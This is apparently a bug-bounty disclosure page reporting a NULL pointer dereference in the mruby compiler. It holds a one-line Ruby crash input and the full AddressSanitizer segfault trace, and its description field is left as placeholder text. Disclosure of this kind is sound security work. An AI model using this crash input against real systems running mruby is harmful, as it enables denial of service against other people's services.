NULL Pointer Dereference in mruby/mruby
Valid
Reported on
Oct 16th 2021
Description
Please enter a description of the vulnerability.
Proof of Concept
super super( )
Result
~/asan/mruby/bin/mruby ~/crash.rb
AddressSanitizer:DEADLYSIGNAL
=================================================================
==18265==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000030 (pc 0x56328e0aed60 bp 0x7ffe1b4f1b20 sp 0x7ffe1b4f16f0 T0)
==18265==The signal is caused by a READ memory access.
==18265==Hint: address points to the zero page.
#0 0x56328e0aed5f in codegen /root/asan/mruby/mrbgems/mruby-compiler/core/codegen.c:2833
#1 0x56328e0a5b03 in gen_values /root/asan/mruby/mrbgems/mruby-compiler/core/codegen.c:1556
#2 0x56328e0aea4d in codegen /root/asan/mruby/mrbgems/mruby-compiler/core/codegen.c:2807
#3 0x56328e0a904b in codegen /root/asan/mruby/mrbgems/mruby-compiler/core/codegen.c:2100
#4 0x56328e0a52fe in scope_body /root/asan/mruby/mrbgems/mruby-compiler/core/codegen.c:1466
#5 0x56328e0abb65 in codegen /root/asan/mruby/mrbgems/mruby-compiler/core/codegen.c:2468
#6 0x56328e0b6c22 in generate_code /root/asan/mruby/mrbgems/mruby-compiler/core/codegen.c:3851
#7 0x56328e0b6ffa in mrb_generate_code /root/asan/mruby/mrbgems/mruby-compiler/core/codegen.c:3874
#8 0x56328e071718 in mrb_load_exec mrbgems/mruby-compiler/core/parse.y:6843
#9 0x56328e071eeb in mrb_load_detect_file_cxt mrbgems/mruby-compiler/core/parse.y:6911
#10 0x56328df73092 in main /root/asan/mruby/mrbgems/mruby-bin-mruby/tools/mruby/mruby.c:347
#11 0x7f9e2ed870b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2)
#12 0x56328df7042d in _start (/root/asan/mruby/bin/mruby+0xbd42d)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /root/asan/mruby/mrbgems/mruby-compiler/core/codegen.c:2833 in codegen
==18265==ABORTING
We have contacted a member of the
mruby
team and are waiting to hear back
2 years ago
to join this conversation